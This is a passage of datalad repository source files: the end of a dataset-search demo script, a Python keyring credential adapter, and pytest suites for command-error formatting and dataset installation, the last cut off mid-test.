-s author -R haxby\"\n\nsay \"Instead of listing all matching fields, you could specify which fields to report using -r option (using * would list all of them)\"\nrun \"datalad search -s author -r name -r author Haxby\"\n\nsay \"Enough of searching! Let's actually get all those interesting datasets (for now without all the data) we found.\"\nsay \"We could easily do that by passing those reported path as arguments to datalad install command\"\nrun \"datalad search -s author haxby | xargs datalad install\"\nsay \"and explore what we have got\"\nrun \"datalad ls -Lr . | grep -v 'not installed'\"\nrun \"cat openfmri/ds000105/dataset_description.json\"\nsay \"and get data we are interested in, e.g. all the anatomicals within those installed BIDS datasets\"\nrun \"datalad get -J4 openfmri/ds000*/sub-*/anat\"\nrun \"datalad ls -Lr . 
| grep -v 'not installed'\"\n\nsay \"Now it is your turn to find some interesting datasets for yourself!\"" }, { "alpha_fraction": 0.5772784352302551, "alphanum_fraction": 0.579168438911438, "avg_line_length": 35.630767822265625, "blob_id": "77c34586f92fb9555e76a34cd86ac1436ee1f697", "content_id": "9c1ac94e10ffe5fdccf800e473f8f71bab7563fc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4762, "license_type": "permissive", "max_line_length": 97, "num_lines": 130, "path": "/datalad/support/keyring_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Adapters and decorators for keyrings\n\"\"\"\n\nimport os\nimport logging\nlgr = logging.getLogger('datalad.support.keyring')\n\n\nclass Keyring(object):\n \"\"\"Adapter to keyring module\n\n It also delays import of keyring which takes 300ms I guess due to all plugins etc\n \"\"\"\n def __init__(self, keyring_backend=None):\n \"\"\"\n\n Parameters\n ----------\n keyring_backend: keyring.backend.KeyringBackend, optional\n Specific keyring to use. If not provided, the one returned by\n `keyring.get_keyring()` is used\n \"\"\"\n self.__keyring = keyring_backend\n self.__keyring_mod = None\n\n @property\n def _keyring(self):\n if self.__keyring_mod is None:\n # Setup logging for keyring if we are debugging, although keyring's logging\n # is quite scarce ATM\n from datalad.log import lgr\n import logging\n lgr_level = lgr.getEffectiveLevel()\n if lgr_level < logging.DEBUG:\n keyring_lgr = logging.getLogger('keyring')\n keyring_lgr.setLevel(lgr_level)\n keyring_lgr.handlers = lgr.handlers\n lgr.debug(\"Importing keyring\")\n import keyring\n self.__keyring_mod = keyring\n\n if self.__keyring is None:\n from datalad.log import lgr\n # we use module bound interfaces whenever we were not provided a dedicated\n # backend\n self.__keyring = self.__keyring_mod\n the_keyring = self.__keyring_mod.get_keyring()\n if the_keyring.name.lower().startswith('null '):\n lgr.warning(\n \"Keyring module returned '%s', no credentials will be provided\",\n the_keyring.name\n )\n return self.__keyring\n\n @classmethod\n def _get_service_name(cls, name):\n return \"datalad-%s\" % str(name)\n\n # proxy few methods of interest explicitly, to be rebound to the module's\n def get(self, name, field):\n # consult environment, might be provided there and should take precedence\n # NOTE: This env var specification is outdated and not advertised\n # anymmore, but needs to be supported. 
For example, it is used with and\n # was advertised for\n # https://github.com/datalad-datasets/human-connectome-project-openaccess\n env_var = ('DATALAD_%s_%s' % (name, field)).replace('-', '_')\n lgr.log(5, 'Credentials lookup attempt via env var %s', env_var)\n if env_var in os.environ:\n return os.environ[env_var]\n return self._keyring.get_password(self._get_service_name(name), field)\n\n def set(self, name, field, value):\n return self._keyring.set_password(self._get_service_name(name), field, value)\n\n def delete(self, name, field=None):\n if field is None:\n raise NotImplementedError(\"Deletion of all fields associated with a name\")\n try:\n return self._keyring.delete_password(self._get_service_name(name), field)\n except self.__keyring_mod.errors.PasswordDeleteError as exc:\n exc_str = str(exc).lower()\n if 'not found' in exc_str or 'no such password' in exc_str:\n return\n raise\n\n\nclass MemoryKeyring(object):\n \"\"\"A simple keyring which just stores provided info in memory\n\n Primarily for testing\n \"\"\"\n\n def __init__(self):\n self.entries = {}\n\n def get(self, name, field):\n \"\"\"Get password from the specified service.\n \"\"\"\n # to mimic behavior of keyring module\n return self.entries[name][field] \\\n if name in self.entries and field in self.entries[name] \\\n else None\n\n def set(self, name, field, value):\n \"\"\"Set password for the user in the specified service.\n \"\"\"\n self.entries.setdefault(name, {}).update({field: value})\n\n def delete(self, name, field=None):\n \"\"\"Delete password from the specified service.\n \"\"\"\n if name in self.entries:\n if field:\n self.entries[name].pop(field)\n else:\n # TODO: might be implemented by some super class if .keys() of some kind provided\n self.entries.pop(name)\n else:\n raise KeyError(\"No entries associated with %s\" % name)\n\n\nkeyring = Keyring()\n" }, { "alpha_fraction": 0.5518697500228882, "alphanum_fraction": 0.5630277395248413, "avg_line_length": 29.14545440673828, "blob_id": "74440d17e1b3be819137e6666e473c64f6165e8e", "content_id": "1df3beebcb44493c90b9aa017082076cc12a67c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3316, "license_type": "permissive", "max_line_length": 75, "num_lines": 110, "path": "/datalad/runner/tests/test_exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..exception import (\n CommandError,\n _format_json_error_messages,\n)\n\n\ndef get_json_objects(object_count: int, message_count: int) -> list[dict]:\n return [\n {\n \"success\": index % 2 == 0,\n \"file\": f\"file-{index}\",\n \"note\": f\"note-{index}\",\n \"error-messages\": [\n f\"error-message-{index}-{j}\"\n for j in range(message_count)\n ]\n }\n for index in range(object_count)\n ]\n\n\ndef test_format_error_with_duplicates() -> None:\n\n object_count = 10\n message_count = 3\n\n json_objects = get_json_objects(object_count, message_count)\n failed_object_indices = [\n index\n for index in range(object_count)\n if json_objects[index][\"success\"] is False\n ]\n\n # Check single appearance\n result = _format_json_error_messages(json_objects)\n lines = result.splitlines()\n del lines[0]\n assert_equal(len(lines), len(failed_object_indices) * 4)\n for i, failed_index in enumerate(failed_object_indices):\n # Accommodate for non-consistent message formatting, I don't\n # want to change the formatting 
because external tools might\n # depend on it.\n if i == 0:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n else:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n for j in range(message_count):\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j}\")\n\n # Check double appearance\n result = _format_json_error_messages(json_objects + json_objects)\n lines = result.splitlines()\n del lines[0]\n assert_equal(len(lines), len(failed_object_indices) * 4)\n\n for i, failed_index in enumerate(failed_object_indices):\n if i == 0:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n else:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n for j in range(message_count - 1):\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j}\")\n j = message_count - 1\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j} [2 times]\")\n\n\ndef test_format_no_errors() -> None:\n json_objects = get_json_objects(1, 3)\n\n result = _format_json_error_messages(json_objects)\n assert_equal(result, \"\")\n\n result = _format_json_error_messages(json_objects + json_objects)\n assert_equal(result, \"\")\n\n\ndef test_command_error_rendering() -> None:\n command_error = CommandError(\n cmd=\"<cmd>\",\n msg=\"<msg>\",\n code=1,\n stdout=\"<stdout>\",\n stderr=\"<stderr>\",\n cwd=\"<cwd>\",\n kwarg1=\"<kwarg1>\",\n kwarg2=\"<kwarg2>\")\n\n result = command_error.to_str()\n assert_equal(\n result,\n \"CommandError: '<cmd>' failed with exitcode 1 under <cwd> [<msg>] \"\n \"[info keys: kwarg1, kwarg2] [out: '<stdout>'] [err: '<stderr>']\"\n )\n\n result = command_error.to_str(False)\n assert_equal(\n result,\n \"CommandError: '<cmd>' failed with exitcode 1 under <cwd> [<msg>] \"\n \"[info keys: kwarg1, kwarg2]\"\n )\n" }, { "alpha_fraction": 0.6303243041038513, "alphanum_fraction": 0.6370590925216675, "avg_line_length": 36.15580749511719, "blob_id": "49f668456e0f00867c526087911c198d020335cb", "content_id": "2741ff962e2140da210a3e2f08027b9fef68f6d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39348, "license_type": "permissive", "max_line_length": 110, "num_lines": 1059, "path": "/datalad/distribution/tests/test_install.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test install action\n\n\"\"\"\n\nimport logging\nimport os\nfrom os.path import (\n basename,\n dirname,\n exists,\n isdir,\n)\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n create,\n get,\n install,\n)\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.interface.results import YieldDatasets\nfrom datalad.support import path as op\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_testdatasets import (\n _make_dataset_hierarchy,\n _mk_submodule_annex,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n 
DEFAULT_REMOTE,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n get_datasets_topdir,\n integration,\n known_failure_githubci_win,\n known_failure_windows,\n ok_,\n ok_file_has_content,\n ok_startswith,\n put_file_under_git,\n serve_path_via_http,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n use_cassette,\n usecase,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n getpwd,\n on_windows,\n rmtree,\n)\n\nfrom ..dataset import Dataset\n\n###############\n# Test helpers:\n###############\n\[email protected](\"annex\", [False, True])\n@with_tree(tree={'file.txt': '123'})\n@serve_path_via_http\n@with_tempfile\ndef test_guess_dot_git(path=None, url=None, tdir=None, *, annex):\n repo = (AnnexRepo if annex else GitRepo)(path, create=True)\n repo.add('file.txt', git=not annex)\n repo.commit()\n\n # we need to prepare to be served via http, otherwise it must fail\n with swallow_logs() as cml:\n assert_raises(IncompleteResultsError, install, path=tdir, source=url)\n ok_(not exists(tdir))\n\n Runner(cwd=path).run(['git', 'update-server-info'])\n\n with swallow_logs() as cml:\n installed = install(tdir, source=url)\n assert_not_in(\"Failed to get annex.uuid\", cml.out)\n eq_(installed.pathobj.resolve(), Path(tdir).resolve())\n ok_(exists(tdir))\n assert_repo_status(tdir, annex=annex)\n\n\n######################\n# Test actual Install:\n######################\n\ndef test_insufficient_args():\n assert_raises(InsufficientArgumentsError, install)\n assert_raises(InsufficientArgumentsError, install, description=\"some\")\n assert_raises(InsufficientArgumentsError, install, None)\n assert_raises(InsufficientArgumentsError, install, None, description=\"some\")\n\n# ValueError: path is on mount 'D:', start on mount 'C:\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_invalid_args(path=None):\n assert_raises(IncompleteResultsError, install, 'Zoidberg', source='Zoidberg')\n # install to an invalid URL\n assert_raises(ValueError, install, 'ssh://mars:Zoidberg', source='Zoidberg')\n # install to a remote location\n assert_raises(ValueError, install, 'ssh://mars/Zoidberg', source='Zoidberg')\n # make fake dataset\n ds = create(path)\n # explicit 'source' as a kwarg\n assert_raises(IncompleteResultsError, install, '/higherup.', source='Zoidberg', dataset=ds)\n # or obscure form for multiple installation \"things\"\n assert_raises(IncompleteResultsError, install, ['/higherup.', 'Zoidberg'], dataset=ds)\n # and if just given without keyword arg for source -- standard Python exception\n assert_raises(TypeError, install, '/higherup.', 'Zoidberg', dataset=ds)\n\n\n# This test caused a mysterious segvault in gh-1350. 
I reimplementation of\n# the same test functionality in test_clone.py:test_clone_crcns that uses\n# `clone` instead of `install` passes without showing this behavior\n# This test is disabled until some insight into the cause of the issue\n# materializes.\n#@skip_if_no_network\n#@use_cassette('test_install_crcns')\n#@with_tempfile(mkdir=True)\n#@with_tempfile(mkdir=True)\n#def test_install_crcns(tdir=None, ds_path=None):\n# with chpwd(tdir):\n# with swallow_logs(new_level=logging.INFO) as cml:\n# install(\"all-nonrecursive\", source='///')\n# # since we didn't log decorations such as log level atm while\n# # swallowing so lets check if exit code is returned or not\n# # I will test both\n# assert_not_in('ERROR', cml.out)\n# # below one must not fail alone! ;)\n# assert_not_in('with exit code', cml.out)\n#\n# # should not hang in infinite recursion\n# with chpwd('all-nonrecursive'):\n# get(\"crcns\")\n# ok_(exists(_path_(\"all-nonrecursive/crcns/.git/config\")))\n# # and we could repeat installation and get the same result\n# ds1 = install(_path_(\"all-nonrecursive/crcns\"))\n# ok_(ds1.is_installed())\n# ds2 = Dataset('all-nonrecursive').install('crcns')\n# eq_(ds1, ds2)\n# eq_(ds1.path, ds2.path) # to make sure they are a single dataset\n#\n# # again, but into existing dataset:\n# ds = create(ds_path)\n# crcns = ds.install(\"///crcns\")\n# ok_(crcns.is_installed())\n# eq_(crcns.path, opj(ds_path, \"crcns\"))\n# assert_in(crcns.path, ds.get_subdatasets(absolute=True))\n\n\n@skip_if_no_network\n@with_tree(tree={'sub': {}})\ndef test_install_datasets_root(tdir=None):\n with chpwd(tdir):\n ds = install(\"///\")\n ok_(ds.is_installed())\n eq_(ds.path, opj(tdir, get_datasets_topdir()))\n\n # do it a second time:\n result = install(\"///\", result_xfm=None, return_type='list')\n assert_status('notneeded', result)\n eq_(YieldDatasets()(result[0]), ds)\n\n # and a third time into an existing something, that is not a dataset:\n with open(opj(tdir, 'sub', 'a_file.txt'), 'w') as f:\n f.write(\"something\")\n\n with assert_raises(IncompleteResultsError) as cme:\n install(\"sub\", source='///')\n assert_in(\"already exists and not empty\", str(cme.value))\n\n\[email protected](\"type_\", [\"git\", \"annex\"])\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile(mkdir=True)\ndef test_install_simple_local(src_repo=None, path=None, *, type_):\n\n src_ds = Dataset(src_repo).create(result_renderer='disabled', force=True,\n annex=(type_ == \"annex\"))\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n if type_ == 'annex':\n src_ds.save('test-annex.dat', to_git=False)\n elif type_ == 'git':\n pass\n else:\n raise ValueError(\"'type' must be 'git' or 'annex'\")\n # equivalent repo on github:\n url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n sources = [src_ds.path,\n get_local_file_url(src_ds.path, compatibility='git')]\n if not dl_cfg.get('datalad.tests.nonetwork'):\n sources.append(url)\n\n for src in sources:\n origin = Dataset(path)\n\n # now install it somewhere else\n ds = install(path, source=src, description='mydummy')\n eq_(ds.path, path)\n ok_(ds.is_installed())\n if not isinstance(origin.repo, AnnexRepo):\n # this means it is a GitRepo\n ok_(isinstance(origin.repo, GitRepo))\n # stays plain Git repo\n ok_(isinstance(ds.repo, GitRepo))\n ok_(not isinstance(ds.repo, AnnexRepo))\n ok_(GitRepo.is_valid_repo(ds.path))\n files = ds.repo.get_indexed_files()\n assert_in('test.dat', files)\n assert_in('INFO.txt', 
files)\n assert_repo_status(path, annex=False)\n else:\n # must be an annex\n ok_(isinstance(ds.repo, AnnexRepo))\n ok_(AnnexRepo.is_valid_repo(ds.path, allow_noninitialized=False))\n files = ds.repo.get_indexed_files()\n assert_in('test.dat', files)\n assert_in('INFO.txt', files)\n assert_in('test-annex.dat', files)\n assert_repo_status(path, annex=True)\n # no content was installed:\n ok_(not ds.repo.file_has_content('test-annex.dat'))\n uuid_before = ds.repo.uuid\n ok_(uuid_before) # we actually have an uuid\n eq_(ds.repo.get_description(), 'mydummy')\n\n # installing it again, shouldn't matter:\n res = install(path, source=src, result_xfm=None, return_type='list')\n assert_status('notneeded', res)\n ok_(ds.is_installed())\n if isinstance(origin.repo, AnnexRepo):\n eq_(uuid_before, ds.repo.uuid)\n\n # cleanup before next iteration\n rmtree(path)\n\n\n@known_failure_githubci_win\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile\ndef test_install_dataset_from_just_source(src_repo=None, path=None):\n\n src_ds = Dataset(src_repo).create(result_renderer='disabled', force=True)\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n src_ds.save('test-annex.dat', to_git=False)\n # equivalent repo on github:\n src_url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n sources = [src_ds.path,\n get_local_file_url(src_ds.path, compatibility='git')]\n if not dl_cfg.get('datalad.tests.nonetwork'):\n sources.append(src_url)\n\n for url in sources:\n\n with chpwd(path, mkdir=True):\n ds = install(source=url)\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n # cleanup before next iteration\n rmtree(path)\n\n\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile(mkdir=True)\ndef test_install_dataset_from_instance(src=None, dst=None):\n origin = Dataset(src).create(result_renderer='disabled', force=True)\n origin.save(['INFO.txt', 'test.dat'], to_git=True)\n origin.save('test-annex.dat', to_git=False)\n\n clone = install(source=origin, path=dst)\n\n assert_is_instance(clone, Dataset)\n ok_startswith(clone.path, dst)\n ok_(clone.is_installed())\n ok_(GitRepo.is_valid_repo(clone.path))\n assert_repo_status(clone.path, annex=None)\n assert_in('INFO.txt', clone.repo.get_indexed_files())\n\n\n@known_failure_githubci_win\n@skip_if_no_network\n@with_tempfile\ndef test_install_dataset_from_just_source_via_path(path=None):\n # for remote urls only, the source could be given to `path`\n # to allows for simplistic cmdline calls\n\n url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n\n with chpwd(path, mkdir=True):\n ds = install(url)\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_install_dataladri(src=None, topurl=None, path=None):\n # make plain git repo\n ds_path = opj(src, 'ds')\n gr = GitRepo(ds_path, create=True)\n gr.add('test.txt')\n gr.commit('demo')\n Runner(cwd=gr.path).run(['git', 'update-server-info'])\n # now install it somewhere else\n with patch('datalad.consts.DATASETS_TOPURL', topurl), \\\n swallow_logs():\n ds = 
install(path, source='///ds')\n eq_(ds.path, path)\n assert_repo_status(path, annex=False)\n ok_file_has_content(opj(path, 'test.txt'), 'some')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_recursive(src=None, path_nr=None, path_r=None):\n\n _make_dataset_hierarchy(src)\n\n # first install non-recursive:\n ds = install(path_nr, source=src, recursive=False)\n ok_(ds.is_installed())\n for sub in ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(not sub.is_installed(),\n \"Unintentionally installed: %s\" % (sub,))\n # this also means, subdatasets to be listed as absent:\n eq_(set(ds.subdatasets(recursive=True, state='absent', result_xfm='relpaths')),\n {'sub1'})\n\n # now recursively:\n # don't filter implicit results so we can inspect them\n res = install(path_r, source=src, recursive=True,\n result_xfm=None, result_filter=None)\n # installed a dataset and four subdatasets\n assert_result_count(res, 5, action='install', type='dataset')\n # we recurse top down during installation, so toplevel should appear at\n # first position in returned list\n eq_(res[0]['path'], path_r)\n top_ds = Dataset(res[0]['path'])\n ok_(top_ds.is_installed())\n\n # the subdatasets are contained in returned list:\n # (Note: Until we provide proper (singleton) instances for Datasets,\n # need to check for their paths)\n assert_in_results(res, path=opj(top_ds.path, 'sub1'), type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2'),\n type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2', 'sub3'),\n type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2', 'sub3',\n 'sub4'),\n type='dataset')\n\n eq_(len(top_ds.subdatasets(recursive=True)), 4)\n\n for subds in top_ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subds.is_installed(),\n \"Not installed: %s\" % (subds,))\n # no content was installed:\n ainfo = subds.repo.get_content_annexinfo(init=None,\n eval_availability=True)\n assert_false(any(st[\"has_content\"] for st in ainfo.values()))\n # no absent subdatasets:\n ok_(top_ds.subdatasets(recursive=True, state='absent') == [])\n\n # check if we can install recursively into a dataset\n # https://github.com/datalad/datalad/issues/2982\n subds = ds.install('recursive-in-ds', source=src, recursive=True)\n ok_(subds.is_installed())\n for subsub in subds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subsub.is_installed())\n\n # check that we get subdataset instances manufactured from notneeded results\n # to install existing subdatasets again\n eq_(subds, ds.install('recursive-in-ds'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_recursive_with_data(src=None, path=None):\n\n _make_dataset_hierarchy(src)\n\n # now again; with data:\n res = install(path, source=src, recursive=True, get_data=True,\n result_filter=None, result_xfm=None)\n assert_status('ok', res)\n # installed a dataset and two subdatasets, and one file with content in\n # each\n assert_result_count(res, 5, type='dataset', action='install')\n assert_result_count(res, 2, type='file', action='get')\n # we recurse top down during installation, so toplevel should appear at\n # first position in returned list\n eq_(res[0]['path'], path)\n top_ds = YieldDatasets()(res[0])\n ok_(top_ds.is_installed())\n\n def all_have_content(repo):\n ainfo = repo.get_content_annexinfo(init=None, eval_availability=True)\n return all(st[\"has_content\"] for st in ainfo.values())\n\n if 
isinstance(top_ds.repo, AnnexRepo):\n ok_(all_have_content(top_ds.repo))\n\n for subds in top_ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subds.is_installed(), \"Not installed: %s\" % (subds,))\n if isinstance(subds.repo, AnnexRepo):\n ok_(all_have_content(subds.repo))\n\n\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n# 'local-url', 'network'\n# TODO: Somehow annex gets confused while initializing installed ds, whose\n# .git/config show a submodule url \"file:///aaa/bbb%20b/...\"\n# this is delivered by with_testrepos as the url to clone\n@with_tempfile\ndef test_install_into_dataset(source=None, top_path=None):\n src_ds = Dataset(source).create(result_renderer='disabled', force=True)\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n src_ds.save('test-annex.dat', to_git=False)\n\n ds = create(top_path)\n assert_repo_status(ds.path)\n\n subds = ds.install(\"sub\", source=source)\n ok_(isdir(opj(subds.path, '.git')))\n ok_(subds.is_installed())\n assert_in('sub', ds.subdatasets(result_xfm='relpaths'))\n # sub is clean:\n assert_repo_status(subds.path, annex=None)\n # top is too:\n assert_repo_status(ds.path, annex=None)\n ds.save(message='addsub')\n # now it is:\n assert_repo_status(ds.path, annex=None)\n\n # but we could also save while installing and there should be no side-effect\n # of saving any other changes if we state to not auto-save changes\n # Create a dummy change\n create_tree(ds.path, {'dummy.txt': 'buga'})\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n subds_ = ds.install(\"sub2\", source=source)\n eq_(subds_.path, opj(ds.path, \"sub2\")) # for paranoid yoh ;)\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n # and we should achieve the same behavior if we create a dataset\n # and then decide to add it\n create(_path_(top_path, 'sub3'))\n assert_repo_status(ds.path, untracked=['dummy.txt', 'sub3/'])\n ds.save('sub3')\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n\n@slow # 15sec on Yarik's laptop\n@usecase # 39.3074s\n@skip_if_no_network\n@with_tempfile\ndef test_failed_install_multiple(top_path=None):\n ds = create(top_path)\n\n create(_path_(top_path, 'ds1'))\n create(_path_(top_path, 'ds3'))\n assert_repo_status(ds.path, annex=None, untracked=['ds1/', 'ds3/'])\n\n # specify install with multiple paths and one non-existing\n with assert_raises(IncompleteResultsError) as cme:\n ds.install(['ds1', 'ds2', '///crcns', '///nonexisting', 'ds3'],\n on_failure='continue')\n\n # install doesn't add existing submodules -- add does that\n assert_repo_status(ds.path, annex=None, untracked=['ds1/', 'ds3/'])\n ds.save(['ds1', 'ds3'])\n assert_repo_status(ds.path, annex=None)\n # those which succeeded should be saved now\n eq_(ds.subdatasets(result_xfm='relpaths'), ['crcns', 'ds1', 'ds3'])\n # and those which didn't -- listed\n eq_(set(r.get('source_url', r['path']) for r in cme.value.failed),\n {'///nonexisting', _path_(top_path, 'ds2')})\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_known_subdataset(src=None, path=None):\n\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # get the superdataset:\n ds = install(path, source=src)\n # subdataset not installed:\n subds = Dataset(opj(path, 'subm 1'))\n assert_false(subds.is_installed())\n assert_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_not_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n # install it:\n 
ds.install('subm 1')\n ok_(subds.is_installed())\n ok_(AnnexRepo.is_valid_repo(subds.path, allow_noninitialized=False))\n # Verify that it is the correct submodule installed and not\n # new repository initiated\n assert_in(\"test-annex.dat\", subds.repo.get_indexed_files()),\n assert_not_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n\n # now, get the data by reinstalling with -g:\n ok_(subds.repo.file_has_content('test-annex.dat') is False)\n with chpwd(ds.path):\n result = get(path='subm 1', dataset=os.curdir)\n assert_in_results(result, path=opj(subds.path, 'test-annex.dat'))\n ok_(subds.repo.file_has_content('test-annex.dat') is True)\n ok_(subds.is_installed())\n\n\n@slow # 46.3650s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_implicit_install(src=None, dst=None):\n\n origin_top = create(src)\n origin_sub = origin_top.create(\"sub\")\n origin_subsub = origin_sub.create(\"subsub\")\n with open(opj(origin_top.path, \"file1.txt\"), \"w\") as f:\n f.write(\"content1\")\n origin_top.save(\"file1.txt\")\n with open(opj(origin_sub.path, \"file2.txt\"), \"w\") as f:\n f.write(\"content2\")\n origin_sub.save(\"file2.txt\")\n with open(opj(origin_subsub.path, \"file3.txt\"), \"w\") as f:\n f.write(\"content3\")\n origin_subsub.save(\"file3.txt\")\n origin_top.save(recursive=True)\n\n # first, install toplevel:\n ds = install(dst, source=src)\n ok_(ds.is_installed())\n\n sub = Dataset(opj(ds.path, \"sub\"))\n ok_(not sub.is_installed())\n subsub = Dataset(opj(sub.path, \"subsub\"))\n ok_(not subsub.is_installed())\n\n # fail on obscure non-existing one\n assert_raises(IncompleteResultsError, ds.install, source='obscure')\n\n # install 3rd level and therefore implicitly the 2nd:\n result = ds.install(path=opj(\"sub\", \"subsub\"))\n ok_(sub.is_installed())\n ok_(subsub.is_installed())\n # but by default implicit results are not reported\n eq_(result, subsub)\n\n # fail on obscure non-existing one in subds\n assert_raises(IncompleteResultsError, ds.install, source=opj('sub', 'obscure'))\n\n # clean up, the nasty way\n rmtree(dst, chmod_files=True)\n ok_(not exists(dst))\n\n # again first toplevel:\n ds = install(dst, source=src)\n ok_(ds.is_installed())\n sub = Dataset(opj(ds.path, \"sub\"))\n ok_(not sub.is_installed())\n subsub = Dataset(opj(sub.path, \"subsub\"))\n ok_(not subsub.is_installed())\n\n # now implicit but without an explicit dataset to install into\n # (deriving from CWD):\n with chpwd(dst):\n # don't ask for the file content to make return value comparison\n # simpler\n result = get(path=opj(\"sub\", \"subsub\"), get_data=False, result_xfm='datasets')\n ok_(sub.is_installed())\n ok_(subsub.is_installed())\n eq_(result, [sub, subsub])\n\n\n@with_tempfile(mkdir=True)\ndef test_failed_install(dspath=None):\n ds = create(dspath)\n assert_raises(IncompleteResultsError,\n ds.install,\n \"sub\",\n source=\"http://nonexistingreallyanything.datalad.org/bla\")\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_list(path=None, top_path=None):\n\n _mk_submodule_annex(path, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # we want to be able to install several things, if these are known\n # (no 'source' allowed). 
